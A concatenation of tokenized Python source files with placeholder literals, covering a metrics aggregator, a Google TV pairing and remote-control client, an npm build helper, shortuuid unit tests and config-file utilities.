<NUM_LIT:0> : <EOL> reservoir = _SampleSet ( cls . _MAX_PERCENTILE_SIZE ) <EOL> cls . VARZ_DATA [ metric ] [ source ] = reservoir <EOL> reservoir . Sample ( value ) <EOL> def DefaultKeySelector ( k ) : <EOL> """<STR_LIT>""" <EOL> VerifySource ( k ) <EOL> return k . service , k . client_id <EOL> class VarzAggregator ( object ) : <EOL> """<STR_LIT>""" <EOL> MAX_AGG_AGE = <NUM_LIT:5> * <NUM_LIT> <EOL> class _Agg ( object ) : <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT:count>' , '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . total = <NUM_LIT:0.0> <EOL> self . count = <NUM_LIT:0> <EOL> self . work = <NUM_LIT:0.0> <EOL> @ staticmethod <EOL> def CalculatePercentile ( values , pct ) : <EOL> if not values : <EOL> return <NUM_LIT:0> <EOL> k = ( len ( values ) - <NUM_LIT:1> ) * pct <EOL> f = math . floor ( k ) <EOL> c = math . ceil ( k ) <EOL> if f == c : <EOL> return values [ int ( k ) ] <EOL> d0 = values [ int ( f ) ] * ( c - k ) <EOL> d1 = values [ int ( c ) ] * ( k - f ) <EOL> return d0 + d1 <EOL> @ staticmethod <EOL> def _Downsample ( lst , target_size ) : <EOL> if target_size == <NUM_LIT:0> : <EOL> return <EOL> elif len ( lst ) < <NUM_LIT:3> or len ( lst ) <= target_size : <EOL> for n in lst : <EOL> yield n <EOL> else : <EOL> skip = len ( lst ) / target_size <EOL> lst = sorted ( lst ) <EOL> for i , n in enumerate ( lst [ <NUM_LIT:0> : - <NUM_LIT:2> ] ) : <EOL> if i % skip == <NUM_LIT:0> : <EOL> yield n <EOL> yield lst [ - <NUM_LIT:1> ] <EOL> @ staticmethod <EOL> def Aggregate ( varz , metrics , key_selector = None ) : <EOL> """<STR_LIT>""" <EOL> if not key_selector : <EOL> key_selector = DefaultKeySelector <EOL> agg = defaultdict ( dict ) <EOL> now = LOW_RESOLUTION_TIME_SOURCE . now <EOL> for metric in varz . keys ( ) : <EOL> if metric not in metrics : <EOL> continue <EOL> varz_type = metrics [ metric ] <EOL> assert isinstance ( varz_type , int ) , varz_type <EOL> metric_agg = agg [ metric ] <EOL> gevent . sleep ( <NUM_LIT:0> ) <EOL> for source in varz [ metric ] . keys ( ) : <EOL> key = key_selector ( source ) <EOL> data = varz [ metric ] [ source ] <EOL> if key not in metric_agg : <EOL> metric_agg [ key ] = VarzAggregator . _Agg ( ) <EOL> if isinstance ( data , _SampleSet ) : <EOL> metric_agg [ key ] . work = [ ] <EOL> if isinstance ( data , _SampleSet ) : <EOL> if ( now - data . last_update ) < VarzAggregator . MAX_AGG_AGE : <EOL> metric_agg [ key ] . work . append ( data ) <EOL> metric_agg [ key ] . count += <NUM_LIT:1> <EOL> else : <EOL> metric_agg [ key ] . work += data <EOL> metric_agg [ key ] . count += <NUM_LIT:1> <EOL> if varz_type in ( VarzType . AggregateTimer , VarzType . Counter , <EOL> VarzType . Gauge , VarzType . Rate ) : <EOL> for source_agg in metric_agg . values ( ) : <EOL> source_agg . total = source_agg . work <EOL> elif varz_type in ( VarzType . AverageTimer , VarzType . AverageRate ) : <EOL> for source_agg in metric_agg . values ( ) : <EOL> if source_agg . count > <NUM_LIT:0> : <EOL> pct_sample = <NUM_LIT:1.0> / source_agg . count <EOL> values = [ VarzAggregator . _Downsample ( v . data , int ( len ( v . data ) * pct_sample ) ) <EOL> for v in source_agg . work ] <EOL> values = sorted ( itertools . chain ( * values ) ) <EOL> else : <EOL> values = [ ] <EOL> source_agg . total = [ <EOL> VarzAggregator . CalculatePercentile ( values , pct ) <EOL> for pct in VarzReceiver . VARZ_PERCENTILES <EOL> ] <EOL> if values : <EOL> source_agg . total . insert ( <NUM_LIT:0> , sum ( values ) / float ( len ( values ) ) ) <EOL> else : <EOL> source_agg . total . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> source_agg . work = None <EOL> else : <EOL> for source_agg in metric_agg . values ( ) : <EOL> source_agg . total = float ( source_agg . work ) / source_agg . count <EOL> return agg <EOL> class VarzSocketWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Varz ( VarzBase ) : <EOL> _VARZ_BASE_NAME = '<STR_LIT>' <EOL> _VARZ = { <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : Counter , <EOL> '<STR_LIT>' : Counter , <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : AverageTimer <EOL> } <EOL> def __init__ ( self , socket , varz_tag ) : <EOL> self . _socket = socket <EOL> self . _is_open = self . _socket . isOpen ( ) <EOL> self . _varz = self . Varz ( Source ( service = varz_tag , endpoint = '<STR_LIT>' % ( self . host , self . port ) ) ) <EOL> @ property <EOL> def host ( self ) : <EOL> return self . _socket . host <EOL> @ property <EOL> def port ( self ) : <EOL> return self . _socket . port <EOL> def isOpen ( self ) : <EOL> return self . _socket . isOpen ( ) <EOL> def read ( self , sz ) : <EOL> buff = self . _socket . read ( sz ) <EOL> self . _varz . bytes_recv ( len ( buff ) ) <EOL> return buff <EOL> def recv_into ( self , buf , sz ) : <EOL> return self . _socket . handle . recv_into ( buf , sz ) <EOL> def flush ( self ) : <EOL> pass <EOL> def write ( self , buff ) : <EOL> self . _socket . handle . sendall ( buff ) <EOL> self . _varz . bytes_sent ( len ( buff ) ) <EOL> def open ( self ) : <EOL> with self . _varz . open_latency . Measure ( ) : <EOL> self . _socket . open ( ) <EOL> if self . _socket . handle : <EOL> self . _socket . handle . setsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY , <NUM_LIT:1> ) <EOL> self . _is_open = True <EOL> self . _varz . connects ( ) <EOL> self . _varz . num_connections ( <NUM_LIT:1> ) <EOL> def close ( self ) : <EOL> if self . _is_open : <EOL> self . _is_open = False <EOL> self . _varz . num_connections ( - <NUM_LIT:1> ) <EOL> self . _socket . close ( ) <EOL> def readAll ( self , sz ) : <EOL> buff = bytearray ( sz ) <EOL> view = memoryview ( buff ) <EOL> have = <NUM_LIT:0> <EOL> while have < sz : <EOL> read_size = sz - have <EOL> chunk_len = self . recv_into ( view [ have : ] , read_size ) <EOL> have += chunk_len <EOL> if chunk_len == <NUM_LIT:0> : <EOL> raise EOFError ( ) <EOL> self . _varz . bytes_recv ( sz ) <EOL> return buff <EOL> class MonoClock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _last = time . time ( ) <EOL> def Sample ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> if now - self . _last > <NUM_LIT:0> : <EOL> self . _last = now <EOL> return self . _last <EOL> class Ema ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , window ) : <EOL> """<STR_LIT>""" <EOL> self . _window = window <EOL> self . _time = - <NUM_LIT:1> <EOL> self . value = <NUM_LIT:0.0> <EOL> def Update ( self , ts , sample ) : <EOL> """<STR_LIT>""" <EOL> if self . _time == - <NUM_LIT:1> : <EOL> self . _time = ts <EOL> self . value = float ( sample ) <EOL> else : <EOL> delta = ts - self . _time <EOL> self . _time = ts <EOL> window = <NUM_LIT:0> if self . _window == <NUM_LIT:0> else math . exp ( - float ( delta ) / self . _window ) <EOL> self . value = ( sample * ( <NUM_LIT:1> - window ) ) + ( self . value * window ) <EOL> return self . value </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import socket <EOL> import ssl <EOL> import struct <EOL> import hashlib <EOL> import itertools <EOL> import M2Crypto . X509 <EOL> from googletv . proto import keycodes_pb2 <EOL> from googletv . proto import polo_pb2 <EOL> from googletv . proto import remote_pb2 <EOL> ENCODING_TYPE_HEXADECIMAL = polo_pb2 . Options . Encoding . ENCODING_TYPE_HEXADECIMAL <EOL> ROLE_TYPE_INPUT = polo_pb2 . Options . ROLE_TYPE_INPUT <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class MessageTypeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class BaseProtocol ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , certfile ) : <EOL> self . host = host <EOL> self . port = port <EOL> self . sock = socket . socket ( ) <EOL> self . ssl = ssl . wrap_socket ( self . sock , certfile = certfile ) <EOL> self . certfile = certfile <EOL> def __enter__ ( self ) : <EOL> self . connect ( ) <EOL> return self <EOL> def __exit__ ( self , unused_type , unused_val , unused_traceback ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> self . ssl . close ( ) <EOL> def connect ( self ) : <EOL> self . ssl . connect ( ( self . host , self . port ) ) <EOL> def send ( self , data ) : <EOL> data_len = struct . pack ( '<STR_LIT>' , len ( data ) ) <EOL> sent = self . ssl . write ( data_len + data ) <EOL> assert sent == len ( data ) + <NUM_LIT:4> <EOL> return sent <EOL> def recv ( self ) : <EOL> len_raw = self . ssl . recv ( <NUM_LIT:4> ) <EOL> data_len = struct . unpack ( '<STR_LIT>' , len_raw ) [ <NUM_LIT:0> ] <EOL> data = self . ssl . recv ( data_len ) <EOL> assert len ( data ) == data_len <EOL> return data <EOL> class PairingProtocol ( BaseProtocol ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , certfile , port = <NUM_LIT> ) : <EOL> super ( PairingProtocol , self ) . __init__ ( host , port , certfile ) <EOL> def send_pairing_request ( self , client_name , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . PairingRequest ( ) <EOL> req . service_name = service_name <EOL> req . client_name = client_name <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_PAIRING_REQUEST ) <EOL> def send_options ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> options = polo_pb2 . Options ( ) <EOL> encoding = options . input_encodings . add ( ) <EOL> encoding . type = ENCODING_TYPE_HEXADECIMAL <EOL> encoding . symbol_length = <NUM_LIT:4> <EOL> self . _send_message ( options , polo_pb2 . OuterMessage . MESSAGE_TYPE_OPTIONS ) <EOL> def send_configuration ( self , encoding_type = ENCODING_TYPE_HEXADECIMAL , <EOL> symbol_length = <NUM_LIT:4> , client_role = ROLE_TYPE_INPUT ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . Configuration ( ) <EOL> req . encoding . type = encoding_type <EOL> req . encoding . symbol_length = symbol_length <EOL> req . client_role = client_role <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_CONFIGURATION ) <EOL> def send_secret ( self , code ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . Secret ( ) <EOL> req . secret = self . _make_secret_payload ( self . _encode_hex_secret ( code ) ) <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_SECRET ) <EOL> def _encode_hex_secret ( self , secret ) : <EOL> """<STR_LIT>""" <EOL> result = bytearray ( len ( secret ) / <NUM_LIT:2> ) <EOL> for i in xrange ( len ( result ) ) : <EOL> start_index = <NUM_LIT:2> * i <EOL> end_index = <NUM_LIT:2> * ( i + <NUM_LIT:1> ) <EOL> result [ i ] = int ( secret [ start_index : end_index ] , <NUM_LIT:16> ) <EOL> return bytes ( result ) <EOL> def _make_secret_payload ( self , encoded_secret ) : <EOL> """<STR_LIT>""" <EOL> servercert = M2Crypto . X509 . load_cert_der_string ( self . ssl . getpeercert ( True ) ) <EOL> clientcert = M2Crypto . X509 . load_cert ( self . certfile ) <EOL> def get_key_pair ( c ) : <EOL> return [ remove_null_bytes ( v [ <NUM_LIT:4> : ] ) for v in c . get_pubkey ( ) . get_rsa ( ) . pub ( ) ] <EOL> def remove_null_bytes ( v ) : <EOL> return '<STR_LIT>' . join ( itertools . dropwhile ( lambda x : x == '<STR_LIT>' , v ) ) <EOL> sexp , smod = get_key_pair ( servercert ) <EOL> cexp , cmod = get_key_pair ( clientcert ) <EOL> digest = hashlib . sha256 ( ) <EOL> digest . update ( cmod ) <EOL> digest . update ( cexp ) <EOL> digest . update ( smod ) <EOL> digest . update ( sexp ) <EOL> digest . update ( encoded_secret [ len ( encoded_secret ) // <NUM_LIT:2> : ] ) <EOL> return digest . digest ( ) <EOL> def _send_message ( self , message , message_type ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . OuterMessage ( ) <EOL> req . protocol_version = <NUM_LIT:1> <EOL> req . status = polo_pb2 . OuterMessage . STATUS_OK <EOL> req . type = message_type <EOL> req . payload = message . SerializeToString ( ) <EOL> data = req . SerializeToString ( ) <EOL> return self . send ( data ) <EOL> def _recv_message ( self , expected_type = None ) : <EOL> """<STR_LIT>""" <EOL> types = polo_pb2 . OuterMessage <EOL> message_types = { <EOL> types . MESSAGE_TYPE_CONFIGURATION : polo_pb2 . Configuration , <EOL> types . MESSAGE_TYPE_CONFIGURATION_ACK : polo_pb2 . ConfigurationAck , <EOL> types . MESSAGE_TYPE_OPTIONS : polo_pb2 . Options , <EOL> types . MESSAGE_TYPE_PAIRING_REQUEST : polo_pb2 . PairingRequest , <EOL> types . MESSAGE_TYPE_PAIRING_REQUEST_ACK : polo_pb2 . PairingRequestAck , <EOL> types . MESSAGE_TYPE_SECRET : polo_pb2 . Secret , <EOL> types . MESSAGE_TYPE_SECRET_ACK : polo_pb2 . SecretAck , <EOL> } <EOL> data = self . recv ( ) <EOL> req = polo_pb2 . OuterMessage . FromString ( data ) <EOL> assert req . status == polo_pb2 . OuterMessage . STATUS_OK <EOL> if expected_type and expected_type != req . type : <EOL> expected = message_types [ expected_type ] . __name__ <EOL> actual = message_types [ req . type ] . __name__ <EOL> raise MessageTypeError ( '<STR_LIT>' % ( expected , actual ) ) <EOL> message_type = message_types [ req . type ] <EOL> message = message_type . FromString ( req . payload ) <EOL> return message <EOL> def recv_pairing_request_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_PAIRING_REQUEST_ACK ) <EOL> def recv_configuration_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_CONFIGURATION_ACK ) <EOL> def recv_secret_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_SECRET_ACK ) <EOL> def recv_options ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_OPTIONS ) <EOL> class AnymoteProtocol ( BaseProtocol ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , certfile , port = <NUM_LIT> ) : <EOL> super ( AnymoteProtocol , self ) . __init__ ( host , port , certfile ) <EOL> def keycode ( self , keycode , action ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . key_event_message . keycode = keycode <EOL> if action == '<STR_LIT>' : <EOL> req . key_event_message . action = keycodes_pb2 . UP <EOL> else : <EOL> req . key_event_message . action = keycodes_pb2 . DOWN <EOL> self . _send_message ( req ) <EOL> def fling ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . fling_message . uri = uri <EOL> self . _send_message ( req ) <EOL> def mouse ( self , x = <NUM_LIT:0> , y = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . mouse_event_message . x_delta = x <EOL> req . mouse_event_message . y_delta = y <EOL> self . _send_message ( req ) <EOL> def press ( self , keycode ) : <EOL> """<STR_LIT>""" <EOL> self . keycode ( keycode , '<STR_LIT>' ) <EOL> self . keycode ( keycode , '<STR_LIT>' ) <EOL> def _send_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RemoteMessage ( ) <EOL> req . request_message . CopyFrom ( message ) <EOL> data = req . SerializeToString ( ) <EOL> return self . send ( data ) </s>
<s> from setuptools import setup , find_packages <EOL> __version__ = "<STR_LIT>" <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = __version__ , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import json <EOL> from . . react_template import ReactTemplate <EOL> from subprocess import check_call <EOL> def run ( cmd , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ "<STR_LIT>" ] = ( sys . platform == "<STR_LIT:win32>" ) <EOL> return check_call ( cmd , * args , ** kwargs ) <EOL> class NPM ( object ) : <EOL> package_template = ( """<STR_LIT>""" ) <EOL> dev_dependencies = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> def __init__ ( self , repo_root ) : <EOL> self . repo_root = repo_root <EOL> def create_package_json ( self , <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> main = "<STR_LIT>" , <EOL> dependencies = { } , <EOL> scripts = { } ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if "<STR_LIT>" not in scripts : <EOL> _build = "<STR_LIT>" <EOL> scripts [ "<STR_LIT>" ] = _build <EOL> options = { <EOL> "<STR_LIT:name>" : name , <EOL> "<STR_LIT:version>" : version , <EOL> "<STR_LIT>" : main , <EOL> "<STR_LIT>" : json . dumps ( scripts ) , <EOL> "<STR_LIT>" : json . dumps ( dependencies ) , <EOL> "<STR_LIT>" : json . dumps ( self . dev_dependencies ) <EOL> } <EOL> rt = ReactTemplate ( self . package_template , <EOL> options , self . repo_root + "<STR_LIT>" ) <EOL> rt . to_js ( ) <EOL> def run ( self ) : <EOL> if not os . path . isfile ( self . repo_root + "<STR_LIT>" ) : <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> self . create_package_json ( ) <EOL> cmds = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> try : <EOL> run ( cmds , cwd = self . repo_root ) <EOL> except OSError as e : <EOL> print ( "<STR_LIT>" % e , file = sys . stderr ) <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> raise </s>
<s> import os <EOL> import string <EOL> import sys <EOL> import unittest <EOL> import pep8 <EOL> from collections import defaultdict <EOL> from uuid import UUID , uuid4 <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( __file__ + "<STR_LIT>" ) ) <EOL> from shortuuid . main import * <EOL> class LegacyShortUUIDTest ( unittest . TestCase ) : <EOL> def test_generation ( self ) : <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> def test_encoding ( self ) : <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( encode ( u ) , "<STR_LIT>" ) <EOL> def test_decoding ( self ) : <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( decode ( "<STR_LIT>" ) , u ) <EOL> def test_alphabet ( self ) : <EOL> backup_alphabet = get_alphabet ( ) <EOL> alphabet = "<STR_LIT>" <EOL> set_alphabet ( alphabet ) <EOL> self . assertEqual ( alphabet , get_alphabet ( ) ) <EOL> set_alphabet ( "<STR_LIT>" ) <EOL> self . assertEqual ( alphabet , get_alphabet ( ) ) <EOL> self . assertEqual ( set ( uuid ( ) ) , set ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( <NUM_LIT> < len ( uuid ( ) ) < <NUM_LIT> ) <EOL> u = uuid4 ( ) <EOL> self . assertEqual ( u , decode ( encode ( u ) ) ) <EOL> u = uuid ( ) <EOL> self . assertEqual ( u , encode ( decode ( u ) ) ) <EOL> self . assertRaises ( ValueError , set_alphabet , "<STR_LIT:1>" ) <EOL> self . assertRaises ( ValueError , set_alphabet , "<STR_LIT>" ) <EOL> set_alphabet ( backup_alphabet ) <EOL> self . assertRaises ( ValueError , lambda x : ShortUUID ( x ) , "<STR_LIT:0>" ) <EOL> def test_random ( self ) : <EOL> self . assertEqual ( len ( random ( ) ) , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:100> ) : <EOL> self . assertEqual ( len ( random ( i ) ) , i ) <EOL> class ClassShortUUIDTest ( unittest . TestCase ) : <EOL> def test_generation ( self ) : <EOL> su = ShortUUID ( ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> def test_encoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( su . encode ( u ) , "<STR_LIT>" ) <EOL> def test_decoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( su . decode ( "<STR_LIT>" ) , u ) <EOL> def test_random ( self ) : <EOL> su = ShortUUID ( ) <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> self . assertEqual ( len ( su . random ( ) ) , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:100> ) : <EOL> self . assertEqual ( len ( su . random ( i ) ) , i ) <EOL> def test_alphabet ( self ) : <EOL> alphabet = "<STR_LIT>" <EOL> su1 = ShortUUID ( alphabet ) <EOL> su2 = ShortUUID ( ) <EOL> self . assertEqual ( alphabet , su1 . get_alphabet ( ) ) <EOL> su1 . set_alphabet ( "<STR_LIT>" ) <EOL> self . assertEqual ( alphabet , su1 . get_alphabet ( ) ) <EOL> self . assertEqual ( set ( su1 . uuid ( ) ) , set ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( <NUM_LIT> < len ( su1 . uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su2 . uuid ( ) ) < <NUM_LIT> ) <EOL> u = uuid4 ( ) <EOL> self . assertEqual ( u , su1 . decode ( su1 . encode ( u ) ) ) <EOL> u = su1 . uuid ( ) <EOL> self . assertEqual ( u , su1 . encode ( su1 . decode ( u ) ) ) <EOL> self . assertRaises ( ValueError , su1 . set_alphabet , "<STR_LIT:1>" ) <EOL> self . assertRaises ( ValueError , su1 . set_alphabet , "<STR_LIT>" ) <EOL> def test_encoded_length ( self ) : <EOL> su1 = ShortUUID ( ) <EOL> self . assertEqual ( su1 . encoded_length ( ) , <NUM_LIT> ) <EOL> base64_alphabet = string . ascii_uppercase + string . ascii_lowercase + string . digits + '<STR_LIT>' <EOL> su2 = ShortUUID ( base64_alphabet ) <EOL> self . assertEqual ( su2 . encoded_length ( ) , <NUM_LIT> ) <EOL> binary_alphabet = "<STR_LIT>" <EOL> su3 = ShortUUID ( binary_alphabet ) <EOL> self . assertEqual ( su3 . encoded_length ( ) , <NUM_LIT> ) <EOL> su4 = ShortUUID ( ) <EOL> self . assertEqual ( su4 . encoded_length ( num_bytes = <NUM_LIT:8> ) , <NUM_LIT:11> ) <EOL> def test_pep8 ( self ) : <EOL> pep8style = pep8 . StyleGuide ( [ [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , [ os . path . dirname ( <EOL> os . path . abspath ( __file__ ) ) ] ] ] , <EOL> parse_argv = False ) <EOL> report = pep8style . check_files ( ) <EOL> assert report . total_errors == <NUM_LIT:0> <EOL> class ShortUUIDPaddingTest ( unittest . TestCase ) : <EOL> def test_padding ( self ) : <EOL> su = ShortUUID ( ) <EOL> random_uid = uuid4 ( ) <EOL> smallest_uid = UUID ( int = <NUM_LIT:0> ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> encoded_small = su . encode ( smallest_uid ) <EOL> self . assertEqual ( len ( encoded_random ) , len ( encoded_small ) ) <EOL> def test_decoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> random_uid = uuid4 ( ) <EOL> smallest_uid = UUID ( int = <NUM_LIT:0> ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> encoded_small = su . encode ( smallest_uid ) <EOL> self . assertEqual ( su . decode ( encoded_small ) , smallest_uid ) <EOL> self . assertEqual ( su . decode ( encoded_random ) , random_uid ) <EOL> def test_consistency ( self ) : <EOL> su = ShortUUID ( ) <EOL> num_iterations = <NUM_LIT:1000> <EOL> uid_lengths = defaultdict ( int ) <EOL> for count in range ( num_iterations ) : <EOL> random_uid = uuid4 ( ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> uid_lengths [ len ( encoded_random ) ] += <NUM_LIT:1> <EOL> decoded_random = su . decode ( encoded_random ) <EOL> self . assertEqual ( random_uid , decoded_random ) <EOL> self . assertEqual ( len ( uid_lengths ) , <NUM_LIT:1> ) <EOL> uid_length = next ( iter ( uid_lengths . keys ( ) ) ) <EOL> self . assertEqual ( uid_lengths [ uid_length ] , num_iterations ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from fileutils import abspath <EOL> from languages import read_possible_languages <EOL> possible_languages = read_possible_languages ( abspath ( '<STR_LIT>' , app ) ) <EOL> routers = { <EOL> app : dict ( <EOL> default_language = possible_languages [ '<STR_LIT:default>' ] [ <NUM_LIT:0> ] , <EOL> languages = [ lang for lang in possible_languages <EOL> if lang != '<STR_LIT:default>' ] <EOL> ) <EOL> } </s>
<s> import sys <EOL> from os import chmod , environ , makedirs , rename , unlink <EOL> from os . path import dirname , exists , join , splitdrive <EOL> def get_root_path ( ) : <EOL> """<STR_LIT>""" <EOL> drive = splitdrive ( sys . executable ) [ <NUM_LIT:0> ] <EOL> if drive : <EOL> return '<STR_LIT>' % drive <EOL> return '<STR_LIT:/>' <EOL> def get_config_path ( name ) : <EOL> """<STR_LIT>""" <EOL> sp_root_dir = join ( environ . get ( '<STR_LIT>' , get_root_path ( ) ) , '<STR_LIT>' ) <EOL> return join ( sp_root_dir , '<STR_LIT>' , name ) <EOL> def store_config_file ( name , data ) : <EOL> """<STR_LIT>""" <EOL> fpath = get_config_path ( name ) <EOL> if not exists ( dirname ( fpath ) ) : <EOL> makedirs ( dirname ( fpath ) , <NUM_LIT> ) <EOL> tmp = fpath + '<STR_LIT>' <EOL> with open ( tmp , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( data ) <EOL> chmod ( tmp , <NUM_LIT> ) <EOL> rename ( tmp , fpath ) <EOL> return fpath <EOL> def delete_config_file ( name ) : <EOL> fpath = get_config_path ( name ) <EOL> unlink ( fpath ) <EOL> return True <EOL> def get_config_file ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> fpath = get_config_path ( name ) <EOL> if exists ( fpath ) : <EOL> return open ( fpath , '<STR_LIT:r>' ) . read ( ) <EOL> else : <EOL> return default <EOL> def strip_equal_sign ( arguments ) : <EOL> """<STR_LIT>""" <EOL> for k , v in arguments . items ( ) : <EOL> if v and isinstance ( v , str ) and ( k . startswith ( '<STR_LIT>' ) or k . startswith ( '<STR_LIT:->' ) ) : <EOL> arguments . update ( { k : v . lstrip ( '<STR_LIT:=>' ) } ) <EOL> v . lstrip ( '<STR_LIT:=>' ) <EOL> return arguments <EOL> def find_non_dash_arguments_and_default_action ( arguments , resource , action ) : <EOL> """<STR_LIT>""" <EOL> from . actions import DEFAULT_ACTION <EOL> from . resources import AVAILABLE_RESOURCES <EOL> arguments = strip_equal_sign ( arguments ) <EOL> if resource and resource . find ( '<STR_LIT:=>' ) != - <NUM_LIT:1> : <EOL> arguments [ '<STR_LIT>' ] . append ( resource ) <EOL> arguments [ '<STR_LIT>' ] = None <EOL> resource = None <EOL> if action in AVAILABLE_RESOURCES and not resource : <EOL> resource = action <EOL> action = DEFAULT_ACTION <EOL> return arguments , resource , action <EOL> def check_primary_identifier_without_flags ( arguments , resource , action ) : <EOL> """<STR_LIT>""" <EOL> 